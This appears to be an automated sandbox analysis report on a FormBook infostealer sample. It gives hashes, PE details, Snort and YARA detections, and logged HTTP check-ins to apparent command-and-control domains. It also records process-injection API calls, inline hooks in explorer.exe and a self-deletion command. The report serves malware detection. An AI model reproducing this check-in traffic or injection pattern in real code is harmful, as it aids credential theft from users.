File name: NvkGETsSDb.exe
File size: 533504
MD5: e17b528f9c192653dc9777bd46e48d82
SHA1: f4dfc93942ed0c091340057f1164b1e1e6f4a148
SHA256: 83708560ecc442b5b6dadbdf5af39ae4f1e843664c932a9de3eff1e38bf6d4a5
SHA512: d041efc3a98c8fc690841669f3e9722c43bbee4c6eac7191056b7dff5b8c27d938bf9f7de3409f27239cadf46c70696c12a9c98e86f772339e902b295060ae29
SSDEEP: 12288:ouQwyxAyhGdds0/v8mEMRp9LviDdzs/4cuKr:LyAL/vVRfl
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...qzya..............0.............:8... ...@....@.. ....................................@................................

                      File Icon

Icon Hash: 00828e8e8686b000

                      Static PE Info

                      General

Entrypoint: 0x48383a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x61797A71 [Wed Oct 27 16:12:33 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al

                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x837e8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x84000 | 0x5d4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x81840 | 0x81a00 | False | 0.692274514826 | data | 6.73403579099 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x84000 | 0x5d4 | 0x600 | False | 0.43359375 | data | 4.18320178133 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x86000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x84090 | 0x344 | data |  |
RT_MANIFEST | 0x843e4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |  |

                      Imports

DLL | Import
mscoree.dll | _CorExeMain

                      Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Delchamps 2015
Assembly Version | 7.3.0.0
InternalName | ComMemberTy.exe
FileVersion | 7.3.0.0
CompanyName | Delchamps
LegalTrademarks |
Comments |
ProductName | Platformer_AI
ProductVersion | 7.3.0.0
FileDescription | Platformer_AI
OriginalFilename | ComMemberTy.exe

                      Network Behavior

                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/27/21-19:37:46.597276 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.5 | 184.168.131.241
10/27/21-19:37:46.597276 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.5 | 184.168.131.241
10/27/21-19:37:46.597276 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.5 | 184.168.131.241

                      Network Port Distribution

                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2021 19:37:27.982541084 CEST | 49799 | 80 | 192.168.2.5 | 198.46.90.29
Oct 27, 2021 19:37:28.088212013 CEST | 80 | 49799 | 198.46.90.29 | 192.168.2.5
Oct 27, 2021 19:37:28.090246916 CEST | 49799 | 80 | 192.168.2.5 | 198.46.90.29
Oct 27, 2021 19:37:28.090456009 CEST | 49799 | 80 | 192.168.2.5 | 198.46.90.29
Oct 27, 2021 19:37:28.195401907 CEST | 80 | 49799 | 198.46.90.29 | 192.168.2.5
Oct 27, 2021 19:37:28.198955059 CEST | 80 | 49799 | 198.46.90.29 | 192.168.2.5
Oct 27, 2021 19:37:28.199266911 CEST | 49799 | 80 | 192.168.2.5 | 198.46.90.29
Oct 27, 2021 19:37:28.199538946 CEST | 49799 | 80 | 192.168.2.5 | 198.46.90.29
Oct 27, 2021 19:37:28.306003094 CEST | 80 | 49799 | 198.46.90.29 | 192.168.2.5
Oct 27, 2021 19:37:46.433934927 CEST | 49808 | 80 | 192.168.2.5 | 184.168.131.241
Oct 27, 2021 19:37:46.597023964 CEST | 80 | 49808 | 184.168.131.241 | 192.168.2.5
Oct 27, 2021 19:37:46.597141027 CEST | 49808 | 80 | 192.168.2.5 | 184.168.131.241
Oct 27, 2021 19:37:46.597275972 CEST | 49808 | 80 | 192.168.2.5 | 184.168.131.241
Oct 27, 2021 19:37:46.760374069 CEST | 80 | 49808 | 184.168.131.241 | 192.168.2.5
Oct 27, 2021 19:37:46.781284094 CEST | 80 | 49808 | 184.168.131.241 | 192.168.2.5
Oct 27, 2021 19:37:46.781377077 CEST | 80 | 49808 | 184.168.131.241 | 192.168.2.5
Oct 27, 2021 19:37:46.781502008 CEST | 49808 | 80 | 192.168.2.5 | 184.168.131.241
Oct 27, 2021 19:37:46.781589031 CEST | 49808 | 80 | 192.168.2.5 | 184.168.131.241
Oct 27, 2021 19:37:46.944431067 CEST | 80 | 49808 | 184.168.131.241 | 192.168.2.5

                      UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2021 19:37:27.807337046 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Oct 27, 2021 19:37:27.974387884 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Oct 27, 2021 19:37:46.396549940 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Oct 27, 2021 19:37:46.432111979 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Oct 27, 2021 19:38:07.052898884 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Oct 27, 2021 19:38:07.451025963 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5

                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 27, 2021 19:37:27.807337046 CEST | 192.168.2.5 | 8.8.8.8 | 0x95b3 | Standard query (0) | www.carterscts.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:37:46.396549940 CEST | 192.168.2.5 | 8.8.8.8 | 0x312d | Standard query (0) | www.mr-exclusive.com | A (IP address) | IN (0x0001)
Oct 27, 2021 19:38:07.052898884 CEST | 192.168.2.5 | 8.8.8.8 | 0xbee1 | Standard query (0) | www.lenovoidc.com | A (IP address) | IN (0x0001)

                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 27, 2021 19:37:27.974387884 CEST | 8.8.8.8 | 192.168.2.5 | 0x95b3 | No error (0) | www.carterscts.com | carterscts.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 27, 2021 19:37:27.974387884 CEST | 8.8.8.8 | 192.168.2.5 | 0x95b3 | No error (0) | carterscts.com |  | 198.46.90.29 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:37:46.432111979 CEST | 8.8.8.8 | 192.168.2.5 | 0x312d | No error (0) | www.mr-exclusive.com | mr-exclusive.com |  | CNAME (Canonical name) | IN (0x0001)
Oct 27, 2021 19:37:46.432111979 CEST | 8.8.8.8 | 192.168.2.5 | 0x312d | No error (0) | mr-exclusive.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Oct 27, 2021 19:38:07.451025963 CEST | 8.8.8.8 | 192.168.2.5 | 0xbee1 | Name error (3) | www.lenovoidc.com | none | none | A (IP address) | IN (0x0001)

                      HTTP Request Dependency Graph

                      • www.carterscts.com
                      • www.mr-exclusive.com

                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49799 | 198.46.90.29 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Oct 27, 2021 19:37:28.090456009 CEST | 3714 | OUT | GET /s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZv HTTP/1.1
                      Host: www.carterscts.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
Oct 27, 2021 19:37:28.198955059 CEST | 3714 | IN | HTTP/1.1 404 Not Found
                      Server: nginx/1.21.3
                      Date: Wed, 27 Oct 2021 17:37:28 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 236
                      Connection: close
                      Vary: Accept-Encoding
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      1 | 192.168.2.5 | 49808 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Oct 27, 2021 19:37:46.597275972 CEST | 3980 | OUT | GET /s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZv HTTP/1.1
                      Host: www.mr-exclusive.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      Oct 27, 2021 19:37:46.781284094 CEST | 3981 | IN | HTTP/1.1 302 Found
                      Server: nginx/1.20.1
                      Date: Wed, 27 Oct 2021 17:37:46 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Location: https://www.afternic.com/forsale/mr-exclusive.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                      Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Code Manipulations

                      User Modules

                      Hook Summary

                      Function Name | Hook Type | Active in Processes
                      PeekMessageA | INLINE | explorer.exe
                      PeekMessageW | INLINE | explorer.exe
                      GetMessageW | INLINE | explorer.exe
                      GetMessageA | INLINE | explorer.exe

                      Processes

                      Process: explorer.exe, Module: user32.dll
                      Function Name | Hook Type | New Data
                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE7
                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE7
                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE7
                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE7

                      System Behavior

                      General

                      Start time:19:36:12
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\NvkGETsSDb.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\NvkGETsSDb.exe'
                      Imagebase:0x180000
                      File size:533504 bytes
                      MD5 hash:E17B528F9C192653DC9777BD46E48D82
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Start time:19:36:14
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\NvkGETsSDb.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\NvkGETsSDb.exe
                      Imagebase:0x9e0000
                      File size:533504 bytes
                      MD5 hash:E17B528F9C192653DC9777BD46E48D82
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Start time:19:36:17
                      Start date:27/10/2021
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff693d90000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      General

                      Start time:19:36:42
                      Start date:27/10/2021
                      Path:C:\Windows\SysWOW64\ipconfig.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\ipconfig.exe
                      Imagebase:0x200000
                      File size:29184 bytes
                      MD5 hash:B0C7423D02A007461C850CD0DFE09318
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:moderate

                      General

                      Start time:19:36:46
                      Start date:27/10/2021
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'
                      Imagebase:0x150000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:19:36:48
                      Start date:27/10/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7ecfc0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Code Analysis

                        Executed Functions

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: $-
                        • API String ID: 0-1933255201
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DC8A96
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DC8A96
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DC8668
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DC8668
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetThreadContext.KERNELBASE(?,00000000), ref: 04DC84BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ContextThread
                        • String ID:
                        • API String ID: 1591575202-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetThreadContext.KERNELBASE(?,00000000), ref: 04DC84BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ContextThread
                        • String ID:
                        • API String ID: 1591575202-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DC8748
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DC8586
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 04DC83F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DC8586
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 04DCBDF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 04DC83F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 04DCAD3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 04DCBDF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 04DCAD3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DC8748
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: '
                        • API String ID: 0-1997036262
                        • Opcode ID: 667270483543de9a531deccc25865c5b4056d490977eef1fbea1be8173c3c5e0
                        • Instruction ID: cb92ebe3597b26c744424c856c5a3eac7719134fee6864603fc8e863f1c00df2
                        • Opcode Fuzzy Hash: 667270483543de9a531deccc25865c5b4056d490977eef1fbea1be8173c3c5e0
                        • Instruction Fuzzy Hash: 1F516FB1E016198BEB59CF6B8D4079AFAF7AFC9300F14C1FA851CAB255DB3059868F11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 72020747c096972eeddaeb98491b065f6cd3be4980677cfaffbac025f0afa158
                        • Instruction ID: 2c890745a65d232f20af6923042aeb9072052e4f0ec4635762e497340d48a41a
                        • Opcode Fuzzy Hash: 72020747c096972eeddaeb98491b065f6cd3be4980677cfaffbac025f0afa158
                        • Instruction Fuzzy Hash: 5C22C372865D3EDBC7221F58C5C95D5B370FB6F300B648A58C98148427EF39A22BE395
                        Uniqueness

